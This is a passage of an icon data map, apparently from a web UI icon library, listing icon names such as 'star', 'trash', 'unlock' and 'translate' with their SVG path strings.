.45-1 1v1c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-4 10h-5c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h5c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zm2-5h-7c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h7c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1z"],"sort-numerical":["M9 14.99c-.28 0-.53.11-.71.29L7 16.58v-5.59c0-.55-.45-1-1-1s-1 .45-1 1v5.59l-1.29-1.29a.965.965 0 0 0-.71-.3 1.003 1.003 0 0 0-.71 1.71l3 3c.18.18.43.29.71.29.28 0 .53-.11.71-.29l3-3c.18-.18.29-.43.29-.71a.99.99 0 0 0-1-1zm8.88.23c-.08-.42-.22-.79-.42-1.12-.2-.33-.47-.6-.8-.8-.33-.2-.76-.3-1.28-.3a2.333 2.333 0 0 0-1.72.71c-.21.22-.37.48-.49.78-.11.3-.17.62-.17.97 0 .27.04.54.13.8.08.26.22.5.4.7.19.21.43.38.71.5a2.142 2.142 0 0 0 1.72.02c.25-.12.47-.31.66-.58l.02.02c-.01.19-.04.4-.08.63-.04.24-.11.46-.21.67-.1.21-.23.38-.39.53a.92.92 0 0 1-.62.22c-.24 0-.44-.08-.6-.25-.16-.17-.27-.36-.31-.59h-1.31c.04.29.12.56.24.79.12.23.28.43.48.59.19.16.42.28.67.36.25.08.52.12.82.12.49 0 .9-.1 1.23-.31.34-.21.61-.48.82-.82.21-.34.37-.71.47-1.13.1-.42.15-.83.15-1.25 0-.43-.04-.85-.12-1.26zm-1.42.63c-.05.15-.11.28-.2.4-.09.12-.2.21-.34.27s-.3.1-.49.1c-.17 0-.33-.04-.46-.11s-.24-.17-.33-.29c-.08-.12-.15-.25-.19-.4-.04-.15-.06-.31-.06-.47 0-.15.02-.3.07-.45.05-.15.11-.28.2-.39.09-.12.2-.21.33-.28.13-.07.27-.11.44-.11.17 0 .33.04.47.11.14.07.25.17.34.28a1.387 1.387 0 0 1 .28.86c.01.17-.02.33-.06.48zM15.32 11H17V0h-1.25c-.05.34-.17.62-.34.85-.17.23-.39.42-.63.57-.25.15-.52.25-.83.31-.3.06-.62.09-.94.09v1.41h2.31V11z"],"sort-numerical-desc":["M9 15c-.28 0-.53.11-.71.29L7 16.59v-5.58c0-.55-.45-1-1-1s-1 .45-1 1v5.58L3.71 15.3c-.18-.18-.43-.3-.71-.3a1.003 1.003 0 0 0-.71 1.71l3 3c.18.18.43.29.71.29.28 0 .53-.11.71-.29l3-3A1.003 1.003 0 0 0 9 15zm6.7-1.33a1.5 1.5 0 0 1-.44.43c-.17.11-.37.19-.58.23-.22.04-.44.06-.67.05v1.07h1.66V20H17v-6.99h-1.06c-.04.26-.12.48-.24.66zm3.15-10.3c-.11-.68-.29-1.26-.55-1.76-.26-.5-.62-.89-1.08-1.18C16.75.14 16.17 0 15.46 0c-.54 0-1.03.09-1.46.27-.43.18-.79.44-1.09.76-.3.33-.52.71-.67 1.15-.16.44-.24.92-.24 1.43 0 .54.08 1.04.23 1.47.15.44.37.81.65 1.12.28.31.61.55 1 .72.39.17.82.26 1.3.26.46 0 .88-.11 1.26-.33.38-.22.68-.53.9-.94l.03.03c-.03.35-.07.74-.12 1.16-.05.42-.15.81-.29 1.18-.14.37-.35.68-.61.92-.26.25-.62.37-1.06.37-.43 0-.77-.13-1.03-.4-.25-.27-.4-.62-.44-1.05h-1.64c.02.43.11.83.29 1.18.17.35.39.66.67.91a3.027 3.027 0 0 0 2.07.8c.71 0 1.3-.17 1.79-.5.48-.33.87-.76 1.17-1.29.3-.53.51-1.12.64-1.76.13-.64.19-1.28.19-1.92.01-.77-.05-1.49-.15-2.17zM17.1 4.44c-.08.27-.19.5-.34.71-.15.21-.34.37-.57.49-.23.12-.5.18-.8.18-.3 0-.56-.06-.78-.19-.22-.13-.4-.29-.55-.49-.14-.2-.25-.44-.32-.7-.07-.27-.11-.55-.11-.84 0-.28.04-.55.11-.82.07-.26.18-.49.32-.7.14-.2.33-.36.55-.48.22-.12.48-.17.78-.17.31 0 .57.06.8.18.23.12.42.28.57.48.15.2.26.43.34.69.08.26.11.53.11.82 0 .29-.04.57-.11.84z"],"split-columns":["M15 13a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-3-3a1.003 1.003 0 0 0-1.42 1.42L16.59 9H11V2h5v2c.77 0 1.47.3 2 .78V1c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v3.78C2.53 4.3 3.23 4 4 4V2h5v7H3.41L4.7 7.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-3 3C.11 9.47 0 9.72 0 10c0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L3.41 11H9v7H4v-2c-.77 0-1.47-.3-2-.78V19c0 .55.45 1 1 1h14c.55 0 1-.45 1-1v-3.78c-.53.48-1.23.78-2 .78v2h-5v-7h5.59l-1.29 1.29c-.19.18-.3.43-.3.71z"],square:["M19 0H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 18H2V2h16v16z"],"stacked-chart":["M12 2c0-.55-.45-1-1-1H9c-.55 0-1 .45-1 1v4h4V2zm3 14h2c.55 0 1-.45 1-1v-5h-4v5c0 .55.45 1 1 1zm3-10c0-.55-.45-1-1-1h-2c-.55 0-1 .45-1 1v3h4V6zm-6 1H8v5h4V7zm-9 9h2c.55 0 1-.45 1-1v-3H2v3c0 .55.45 1 1 1zm16 1H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zM6 9c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v2h4V9zm3 7h2c.55 0 1-.45 1-1v-2H8v2c0 .55.45 1 1 1z"],star:["M10 0l3.1 6.6 6.9 1-5 5.1 1.2 7.3-6.2-3.4L3.8 20 5 12.7 0 7.6l6.9-1z"],"star-empty":["M20 7.6l-6.9-1.1L10 0 6.9 6.6 0 7.6l5 5.1L3.8 20l6.2-3.4 6.2 3.4-1.2-7.2 5-5.2zM10 15l-4.5 2.4.9-5.2-3.6-3.6 5-.8L10 3.1l2.2 4.7 5 .8-3.6 3.7.9 5.2L10 15z"],"step-backward":["M15 3c-.23 0-.42.09-.59.21l-.01-.01L8 8V4c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h2c.55 0 1-.45 1-1v-4l6.4 4.8.01-.01c.17.12.36.21.59.21.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],"step-chart":["M19 16H2v-3h4c.55 0 1-.45 1-1V8h3v2c0 .55.45 1 1 1h5c.55 0 1-.45 1-1V6h2c.55 0 1-.45 1-1s-.45-1-1-1h-3c-.55 0-1 .45-1 1v4h-3V7c0-.55-.45-1-1-1H6c-.55 0-1 .45-1 1v4H2V3c0-.55-.45-1-1-1s-1 .45-1 1v14c0 .55.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1z"],"step-forward":["M15 3h-2c-.55 0-1 .45-1 1v4L5.6 3.2l-.01.01C5.42 3.09 5.23 3 5 3c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1 .23 0 .42-.09.59-.21l.01.01L12 12v4c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],stop:["M16 3H4c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h12c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],strikethrough:["M18 9h-4.46a4.7 4.7 0 0 0-.4-.14c-.19-.05-.51-.14-.96-.25-.45-.11-.9-.23-1.37-.35-.47-.12-.89-.23-1.27-.33s-.6-.16-.65-.17c-.53-.15-.95-.37-1.27-.66-.32-.28-.49-.68-.49-1.19 0-.36.09-.66.26-.9s.39-.43.65-.57c.26-.14.55-.24.87-.3s.63-.09.93-.09c.89 0 1.63.19 2.21.57.45.3.75.76.89 1.38h2.63c-.06-.52-.2-.98-.42-1.4-.3-.57-.71-1.05-1.23-1.43a5.33 5.33 0 0 0-1.79-.87c-.7-.2-1.42-.3-2.19-.3-.66 0-1.31.08-1.96.25s-1.22.43-1.73.77-.92.79-1.23 1.32c-.31.52-.46 1.15-.46 1.87 0 .37.05.74.15 1.1.1.36.28.7.53 1.02.18.24.41.47.69.67H2c-.55 0-1 .45-1 1s.45 1 1 1h10.14c.02.01.05.02.07.02.3.11.58.29.84.55.25.26.38.67.38 1.21 0 .27-.06.53-.17.79-.11.26-.29.49-.54.69-.25.2-.57.36-.97.49s-.88.19-1.44.19c-.52 0-1.01-.06-1.45-.17-.45-.11-.84-.29-1.19-.54s-.61-.56-.8-.95c-.05-.08-.09-.18-.12-.28H4.11c.09.43.22.82.4 1.18.33.65.77 1.18 1.32 1.59.55.41 1.2.72 1.94.92.74.2 1.53.3 2.37.3.73 0 1.44-.08 2.14-.25.7-.17 1.33-.43 1.88-.79.55-.36.99-.83 1.33-1.39.34-.56.51-1.25.51-2.05 0-.37-.06-.75-.18-1.12a3.12 3.12 0 0 0-.15-.39H18c.55 0 1-.45 1-1s-.45-1-1-1z"],style:["M18 18H2V2h12.3l2-2H1C.4 0 0 .4 0 1v18c0 .6.4 1 1 1h18c.6 0 1-.4 1-1V7.7l-2 2V18zm1.2-18l-7.6 7.6 2.8 2.8L20 4.8V0h-.8zM4 15.9c3.1.2 5.9.2 8.2-2 1.1-1.1 1.1-3 0-4.1-.6-.5-1.3-.8-2-.8s-1.4.3-1.9.8C7.2 11 6.6 14.3 4 15.9z"],"swap-horizontal":["M16.02 10c-.01 0-.01 0 0 0H16h.02zM2 6h13.58l-2.29 2.29a1 1 0 0 0-.3.71 1.003 1.003 0 0 0 1.71.71l4-4c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-4-4a1.003 1.003 0 0 0-1.42 1.42L15.58 4H2c-.55 0-1 .45-1 1s.45 1 1 1zm2 4h-.02H4zm14 4H4.42l2.29-2.29a1 1 0 0 0 .3-.71 1.003 1.003 0 0 0-1.71-.71l-4 4c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l4 4a1.003 1.003 0 0 0 1.42-1.42L4.42 16H18c.55 0 1-.45 1-1s-.45-1-1-1z"],"swap-vertical":["M9.71 5.3l-4-4A.997.997 0 0 0 5 1.01c-.28 0-.53.11-.71.29l-4 4a1.003 1.003 0 0 0 1.42 1.42L4 4.42V18c0 .55.45 1 1 1s1-.45 1-1V4.42l2.29 2.29a1 1 0 0 0 .71.3 1.003 1.003 0 0 0 .71-1.71zM10 3.98c0 .01 0 .01 0 0V4v-.02zm0 12.04c0-.01 0-.01 0 0V16v.02zm9-3.03c-.28 0-.53.11-.71.29L16 15.58V2c0-.55-.45-1-1-1s-1 .45-1 1v13.58l-2.29-2.29a1.003 1.003 0 0 0-1.42 1.42l4 4c.18.18.43.29.71.29.28 0 .53-.11.71-.29l4-4c.18-.18.29-.43.29-.71 0-.56-.45-1.01-1-1.01z"],"symbol-circle":["M10 4.01a6 6 0 1 0 0 12 6 6 0 1 0 0-12z"],"symbol-cross":["M15 8.01h-3v-3c0-.55-.45-1-1-1H9c-.55 0-1 .45-1 1v3H5c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h3v3c0 .55.45 1 1 1h2c.55 0 1-.45 1-1v-3h3c.55 0 1-.45 1-1v-2c0-.56-.45-1-1-1z"],"symbol-diamond":["M15 10.01c0-.21-.08-.39-.18-.54l.02-.01-4-6-.02.01c-.18-.28-.47-.46-.82-.46s-.64.18-.82.45l-.01-.01-4 6 .02.01c-.11.16-.19.34-.19.55s.08.39.18.54l-.02.01 4 6 .02-.01c.18.27.47.46.82.46s.64-.19.82-.46l.02.01 4-6-.02-.01c.1-.16.18-.34.18-.54z"],"symbol-square":["M15 4.01H5c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h10c.55 0 1-.45 1-1v-10c0-.56-.45-1-1-1z"],"symbol-triangle-down":["M16 5c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1 0 .16.05.31.11.44H4.1l5 10h.01c.17.33.5.56.89.56s.72-.23.89-.56h.01l5-10h-.01c.06-.13.11-.28.11-.44z"],"symbol-triangle-up":["M15.89 14.56l-4.99-10h-.01c-.17-.33-.5-.56-.89-.56s-.72.23-.89.56H9.1l-5 10h.01c-.06.13-.11.28-.11.44 0 .55.45 1 1 1h10c.55 0 1-.45 1-1 0-.16-.05-.31-.11-.44z"],tag:["M2 4a2 2 0 0 1 2-2h4.588a2 2 0 0 1 1.414.586l7.41 7.41a2 2 0 0 1 0 2.828l-4.588 4.588a2 2 0 0 1-2.829 0l-7.41-7.41A2 2 0 0 1 2 8.588V4zm3.489-.006a1.495 1.495 0 1 0 0 2.99 1.495 1.495 0 0 0 0-2.99z"],"take-action":["M5 7c.28 0 .53-.11.71-.29l5-5A1.003 1.003 0 0 0 9.29.29l-5 5A1.003 1.003 0 0 0 5 7zm6 6a1.003 1.003 0 0 0 1.71.71l5-5a1.003 1.003 0 0 0-1.42-1.42l-5 5c-.18.18-.29.43-.29.71zm8 5h-1c0-.55-.45-1-1-1h-7c-.55 0-1 .45-1 1H8c-.55 0-1 .45-1 1s.45 1 1 1h11c.55 0 1-.45 1-1s-.45-1-1-1zm-9-6l6-6-1.29-1.29a1.003 1.003 0 0 0-1.42-1.42L12 2 6 8l1.29 1.29-7 7a1.003 1.003 0 0 0 1.42 1.42l7-7L10 12z"],taxi:["M19 9h-.33l.33 1v.5c0 .15-.03.3-.07.44h.01L17 17.23v.27c0 .83-.67 1.5-1.5 1.5s-1.5-.67-1.5-1.5V17H6v.5c0 .83-.67 1.5-1.5 1.5S3 18.33 3 17.5v-.27l-1.93-6.28h.01c-.05-.15-.08-.3-.08-.45V10s.02-.06.05-.16c.06-.17.16-.47.28-.84H1c-.55 0-1-.45-1-1s.45-1 1-1h1l1-3h-.01v-.01c.25-.64 1-1.31 1.67-1.5 0 0 .78-.21 2.33-.36V1c0-.55.45-1 1-1h4c.55 0 1 .45 1 1v1.13c1.55.14 2.33.36 2.33.36.67.19 1.42.86 1.67 1.5V4H17l1 3h1c.55 0 1 .45 1 1s-.45 1-1 1zM3 11.5c0 .83.67 1.5 1.5 1.5S6 12.33 6 11.5 5.33 10 4.5 10 3 10.67 3 11.5zM16 7l-1-3H5L4 7v1h12V7zm-.5 3c-.83 0-1.5.67-1.5 1.5s.67 1.5 1.5 1.5 1.5-.67 1.5-1.5-.67-1.5-1.5-1.5z"],"text-highlight":["M16 17c-.55 0-1-.45-1-1V4c0-.55.45-1 1-1s1-.45 1-1-.45-1-1-1c-.77 0-1.47.3-2 .78-.53-.48-1.23-.78-2-.78-.55 0-1 .45-1 1s.45 1 1 1 1 .45 1 1v12c0 .55-.45 1-1 1s-1 .45-1 1 .45 1 1 1c.77 0 1.47-.3 2-.78.53.48 1.23.78 2 .78.55 0 1-.45 1-1s-.45-1-1-1zm-4-4H2V7h10V5H1c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h11v-2zm7-8h-3v2h2v6h-2v2h3c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1z"],th:["M19 1H1c-.6 0-1 .5-1 1v16c0 .5.4 1 1 1h18c.5 0 1-.5 1-1V2c0-.5-.5-1-1-1zM7 17H2v-3h5v3zm0-4H2v-3h5v3zm0-4H2V6h5v3zm11 8H8v-3h10v3zm0-4H8v-3h10v3zm0-4H8V6h10v3z"],"th-derived":["M5.3 13.3c-.2.2-.3.4-.3.7 0 .6.4 1 1 1 .3 0 .5-.1.7-.3l3-3c.2-.2.3-.4.3-.7s-.1-.5-.3-.7l-3-3C6.5 7.1 6.3 7 6 7c-.6 0-1 .4-1 1 0 .3.1.5.3.7L6.6 10H1c-.6 0-1 .4-1 1s.4 1 1 1h5.6l-1.3 1.3zM19 1H3c-.5 0-1 .5-1 1v6h1c0-1.7 1.3-3 3-3 .8 0 1.6.3 2.1.9l.1.1H9v.8l1 1V6h8v3h-6.8c.3.3.5.6.6 1H18v3h-6.8l-.1.1-.9.9H18v3h-8v-2.8l-1 1V17H4v-.8c-.6-.5-1-1.3-1-2.2H2v4c0 .5.5 1 1 1h16c.6 0 1-.5 1-1V2c0-.5-.5-1-1-1z"],"th-filtered":["M17.333 10l1.435-1.722a1 1 0 0 0 .232-.64V4.85l1-.9V18c0 .5-.5 1-1 1H1c-.6 0-1-.5-1-1V2c0-.5.4-1 1-1h6.722L12 4.85V6H8v3h4v1H8v3h10v-3h-.667zM7 17v-3H2v3h5zm0-4v-3H2v3h5zm0-4V6H2v3h5zm11 8v-3H8v3h10z","M19.35 0a.642.642 0 1 1 .46 1.1l-3.03 3.03v2.95c0 .18-.07.34-.19.46l-1.28 1.29c-.11.1-.27.17-.45.17-.35 0-.64-.29-.64-.64V4.13L11.19 1.1a.642.642 0 0 1 .45-1.1h7.71z"],"th-list":["M19 1H1c-.6 0-1 .5-1 1v16c0 .5.4 1 1 1h18c.5 0 1-.5 1-1V2c0-.5-.5-1-1-1zm-1 16H2v-3h16v3zm0-4H2v-3h16v3zm0-4H2V6h16v3z"],"thumbs-down":["M18.55 6.56c-.31-.01-.65-.03-1.02-.06.03 0 .06-.01.09-.01.88-.12 1.68-.63 1.76-1.37.08-.75-.58-1.25-1.46-1.33-.32-.03-.65-.05-.99-.08.59-.19 1.05-.54 1.09-1.2.05-.75-.99-1.32-1.87-1.41-.34-.03-.64-.05-.91-.07h-.11c-.28-.02-.54-.02-.77-.02-3.92-.08-7.29.6-9.36 1.93v7.72c2.67 1.66 5.95 4.61 5.26 7.08-.21.76.39 1.35 1.23 1.26 1.01-.11 1.71-1.18 1.75-2.28.05-1.29-.19-2.59-.62-3.74-.05-.32.01-.65.47-.68.61-.04 1.39-.08 1.99-.1.32 0 .64-.01.94-.03h.01c.52-.03 1-.07 1.42-.12.88-.11 1.69-.6 1.79-1.35.1-.75-.55-1.25-1.44-1.35-.07-.01-.13-.02-.2-.02.21-.02.42-.04.61-.06.88-.11 1.69-.6 1.79-1.35.09-.75-.56-1.31-1.45-1.36zM3 3H0v8h3c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],"thumbs-up":["M3 9H0v8h3c.55 0 1-.45 1-1v-6c0-.55-.45-1-1-1zm16.99 3.09c-.1-.75-.91-1.24-1.79-1.35-.19-.02-.4-.05-.61-.06.07-.01.14-.01.2-.02.88-.1 1.53-.61 1.44-1.35-.1-.74-.91-1.24-1.79-1.35-.42-.05-.9-.09-1.42-.12h-.01l-.94-.03c-.6-.02-1.39-.05-1.99-.1-.45-.03-.51-.36-.47-.68.43-1.15.67-2.45.62-3.74-.04-1.11-.74-2.17-1.75-2.28-.84-.09-1.45.5-1.23 1.26.7 2.47-2.58 5.43-5.25 7.08v7.72c2.08 1.33 5.44 2.01 9.35 1.93.24 0 .49-.01.77-.02h.11c.27-.02.57-.04.91-.07.88-.08 1.92-.66 1.87-1.41-.04-.65-.5-1.01-1.09-1.2.34-.03.67-.05.99-.08.89-.08 1.55-.58 1.46-1.33-.08-.75-.88-1.25-1.76-1.37-.03 0-.06-.01-.09-.01.37-.02.71-.04 1.02-.06.91-.05 1.55-.61 1.45-1.36z"],tick:["M17 4c-.28 0-.53.11-.71.29L7 13.59 3.71 10.3A.965.965 0 0 0 3 10a1.003 1.003 0 0 0-.71 1.71l4 4c.18.18.43.29.71.29s.53-.11.71-.29l10-10A1.003 1.003 0 0 0 17 4z"],"tick-circle":["M10 20C4.48 20 0 15.52 0 10S4.48 0 10 0s10 4.48 10 10-4.48 10-10 10zm5-14c-.28 0-.53.11-.71.29L8 12.59l-2.29-2.3a1.003 1.003 0 0 0-1.42 1.42l3 3c.18.18.43.29.71.29.28 0 .53-.11.71-.29l7-7A1.003 1.003 0 0 0 15 6z"],time:["M11 9.59V4c0-.55-.45-1-1-1s-1 .45-1 1v6c0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L11 9.59zM10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z"],"timeline-area-chart":["M19 16H2V3c0-.55-.45-1-1-1s-1 .45-1 1v14c0 .55.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zm0-13.41l-7.07 7.07-4.3-3.44-.01.01A.987.987 0 0 0 7 6c-.24 0-.46.1-.63.24l-.01-.01L3 9.03V15h16V2.59z"],"timeline-bar-chart":["M19 17H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zM9 16h2c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1H9c-.55 0-1 .45-1 1v13c0 .55.45 1 1 1zm6 0h2c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1h-2c-.55 0-1 .45-1 1v9c0 .55.45 1 1 1zM3 16h2c.55 0 1-.45 1-1V9c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v6c0 .55.45 1 1 1z"],"timeline-events":["M5 5c.6 0 1-.4 1-1V2c0-.5-.4-1-1-1s-1 .5-1 1v2c0 .6.4 1 1 1zm10 0c.6 0 1-.4 1-1V2c0-.5-.4-1-1-1s-1 .5-1 1v2c0 .6.4 1 1 1zm-9 9H4v2h2v-2zM17 3v1c0 1.1-.9 2-2 2s-2-.9-2-2V3H7v1c0 1.1-.9 2-2 2s-2-.9-2-2V3H2c-.5 0-1 .5-1 1v14c0 .5.5 1 1 1h16c.5 0 1-.5 1-1V4c0-.5-.5-1-1-1h-1zM7 17H3v-4h4v4zm0-5H3V8h4v4zm5 5H8v-4h4v4zm0-5H8V8h4v4zm5 5h-4v-4h4v4zm0-5h-4V8h4v4zm-6 2H9v2h2v-2zm5-5h-2v2h2V9z"],"timeline-line-chart":["M19 16H2v-1.59l5-5 3.29 3.29c.18.19.43.3.71.3s.53-.11.71-.29l7-7a1.003 1.003 0 0 0-1.42-1.42L11 10.59l-3.29-3.3C7.53 7.11 7.28 7 7 7s-.53.11-.71.29L2 11.59V3c0-.55-.45-1-1-1s-1 .45-1 1v14a.998.998 0 0 0 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1z"],tint:["M9.86 2S3.98 9.18 3.98 12.17C3.99 15.4 6.78 18 9.96 18c3.18-.01 6.04-2.63 6.03-5.86C15.99 9.05 9.86 2 9.86 2z"],torch:["M6.97 19c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-2h-6v2zm-3-15l3 4v8h6V8l3-4h-12zm5 5c0-.55.45-1 1-1s1 .45 1 1v2c0 .55-.45 1-1 1s-1-.45-1-1V9zm6-9h-10c-.55 0-1 .45-1 1v2h12V1c0-.55-.45-1-1-1z"],train:["M16 18h-2l2 2H4l.12-.12L6 18H4c-1.1 0-2-.9-2-2V2c0-1.1 3.58-2 8-2s8 .9 8 2v14c0 1.1-.9 2-2 2zM5.5 15c.83 0 1.5-.67 1.5-1.5S6.33 12 5.5 12 4 12.67 4 13.5 4.67 15 5.5 15zM9 3H4v6h5V3zm7 0h-5v6h5V3zm-1.5 9c-.83 0-1.5.67-1.5 1.5s.67 1.5 1.5 1.5 1.5-.67 1.5-1.5-.67-1.5-1.5-1.5z"],translate:["M19.89 18.56l-4.99-10h-.01c-.17-.33-.5-.56-.89-.56s-.72.23-.89.56h-.01l-1.73 3.46-2.8-2.3 1.99-1.64C11.44 7.34 12 6.23 12 5V4h1c.55 0 1-.45 1-1s-.45-1-1-1H8V1c0-.55-.45-1-1-1S6 .45 6 1v1H1c-.55 0-1 .45-1 1s.45 1 1 1h9v1c0 .62-.28 1.18-.73 1.54L7 8.42 4.73 6.54C4.28 6.18 4 5.62 4 5H2c0 1.23.56 2.34 1.44 3.07l1.99 1.64-3.06 2.52.01.01c-.23.18-.38.45-.38.76 0 .55.45 1 1 1 .24 0 .45-.1.63-.24l.01.01L7 11l3.36 2.77.01-.01c.02.02.05.03.08.05.01 0 .01.01.02.02l-2.36 4.73h.01c-.07.13-.12.28-.12.44 0 .55.45 1 1 1 .39 0 .72-.23.89-.56h.01L11.12 17h5.76l1.22 2.45h.01c.17.32.5.55.89.55.55 0 1-.45 1-1 0-.16-.05-.31-.11-.44zM12.12 15L14 11.24 15.88 15h-3.76z"],trash:["M17 1h-5c0-.55-.45-1-1-1H9c-.55 0-1 .45-1 1H3c-.55 0-1 .45-1 1v1h16V2c0-.55-.45-1-1-1zm.5 3h-15c-.28 0-.5.22-.5.5s.22.5.5.5H3v14c0 .55.45 1 1 1h12c.55 0 1-.45 1-1V5h.5c.28 0 .5-.22.5-.5s-.22-.5-.5-.5zM7 16c0 .55-.45 1-1 1s-1-.45-1-1V8c0-.55.45-1 1-1s1 .45 1 1v8zm4 0c0 .55-.45 1-1 1s-1-.45-1-1V8c0-.55.45-1 1-1s1 .45 1 1v8zm4 0c0 .55-.45 1-1 1s-1-.45-1-1V8c0-.55.45-1 1-1s1 .45 1 1v8z"],tree:["M11 15.542V20H9v-4.458L2 17l4.5-5.625L4 12l3.655-5.483L6 7l4-7 4 7-1.655-.483L16 12l-2.5-.625L18 17l-7-1.458z"],"trending-down":["M19 10c-.55 0-1 .45-1 1v1.37l-6.25-7.03-.01.01A.971.971 0 0 0 11 5c-.23 0-.42.09-.59.21l-.01-.01-3.43 2.58-5.42-3.61-.01.01A.969.969 0 0 0 1 4c-.55 0-1 .45-1 1 0 .35.19.64.46.82l-.01.01 6 4 .01-.02c.15.11.33.19.54.19.23 0 .42-.09.59-.21l.01.01 3.26-2.45L16.77 14H15c-.55 0-1 .45-1 1s.45 1 1 1h4c.55 0 1-.45 1-1v-4c0-.55-.45-1-1-1z"],"trending-up":["M19 4h-4c-.55 0-1 .45-1 1s.45 1 1 1h1.77l-5.91 6.65L7.6 10.2l-.01.01C7.42 10.09 7.23 10 7 10c-.21 0-.39.08-.54.18l-.01-.02-6 4 .01.02c-.27.18-.46.47-.46.82 0 .55.45 1 1 1 .21 0 .39-.08.54-.18l.01.02 5.41-3.61 3.43 2.58.01-.01c.18.11.37.2.6.2.3 0 .56-.14.74-.34l.01.01L18 7.63V9c0 .55.45 1 1 1s1-.45 1-1V5c0-.55-.45-1-1-1z"],"two-columns":["M5 0H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm14.71 9.29l-3-3A1.003 1.003 0 0 0 15 7v6a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71zM12 0H8c-.55 0-1 .45-1 1v18c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],underline:["M10 17c3.3 0 6-2.7 6-6V3.5c0-.8-.7-1.5-1.5-1.5S13 2.7 13 3.5V11c0 1.7-1.3 3-3 3s-3-1.3-3-3V3.5C7 2.7 6.3 2 5.5 2S4 2.7 4 3.5V11c0 3.3 2.7 6 6 6zM16.5 19h-13c-.3 0-.5.2-.5.5s.2.5.5.5h13c.3 0 .5-.2.5-.5s-.2-.5-.5-.5z"],undo:["M5 14c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm9-9H3.41L5.7 2.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-4 4C.11 5.47 0 5.72 0 6c0 .28.11.53.29.71l4 4a1.003 1.003 0 0 0 1.42-1.42L3.41 7H14c2.21 0 4 1.79 4 4s-1.79 4-4 4H9v2h5c3.31 0 6-2.69 6-6s-2.69-6-6-6z"],"ungroup-objects":["M4.5 6C2.01 6 0 8.01 0 10.5S2.01 15 4.5 15 9 12.99 9 10.5 6.99 6 4.5 6zm11 0C13.01 6 11 8.01 11 10.5s2.01 4.5 4.5 4.5 4.5-2.01 4.5-4.5S17.99 6 15.5 6z"],"unknown-vehicle":["M13 11.988v-4H4v-1l1-3h6V2.003a35.867 35.867 0 0 0-1-.015c-3.593 0-5.332.488-5.332.488-.67.188-1.424.864-1.674 1.503l-.004.009H3l-1 3H1a1 1 0 1 0 0 2h.333l-.28.84-.053.16v7.5a1.5 1.5 0 1 0 3 0v-.5h12v.5a1.5 1.5 0 1 0 3 0v-4.5h-5a1 1 0 0 1-1-1zm-8.5 1a1.5 1.5 0 1 1 0-3 1.5 1.5 0 0 1 0 3zM19.83 2.782a2.392 2.392 0 0 0-.592-.853c-.276-.264-.64-.485-1.09-.663C17.695 1.09 17.132 1 16.457 1c-.523 0-.996.084-1.418.253a3.157 3.157 0 0 0-1.084.703c-.299.3-.532.656-.698 1.065-.166.41-.254.861-.264 1.353h2.096c0-.246.028-.476.085-.69.057-.214.145-.4.264-.56.119-.16.27-.287.456-.383.185-.095.406-.143.663-.143.38 0 .677.1.89.3.215.2.321.51.321.93.01.245-.035.45-.135.614-.1.164-.23.314-.392.45a8.598 8.598 0 0 1-.527.41 3.53 3.53 0 0 0-.542.485c-.171.187-.32.412-.45.676-.127.265-.206.592-.234.984v.614h1.924v-.519c.038-.273.13-.5.278-.683.147-.182.316-.343.506-.484a13.5 13.5 0 0 1 .606-.424c.214-.14.408-.312.584-.512s.323-.442.442-.724.178-.642.178-1.079c0-.264-.059-.548-.178-.854zm-4.54 6.099v2.103h2.237V8.881H15.29z"],unlock:["M14 1c-2.21 0-4 1.79-4 4v4H2c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h12c.55 0 1-.45 1-1v-8c0-.55-.45-1-1-1h-2V5c0-1.1.9-2 2-2s2 .9 2 2v2c0 .55.45 1 1 1s1-.45 1-1V5c0-2.21-1.79-4-4-4z"],unpin:["M11.77 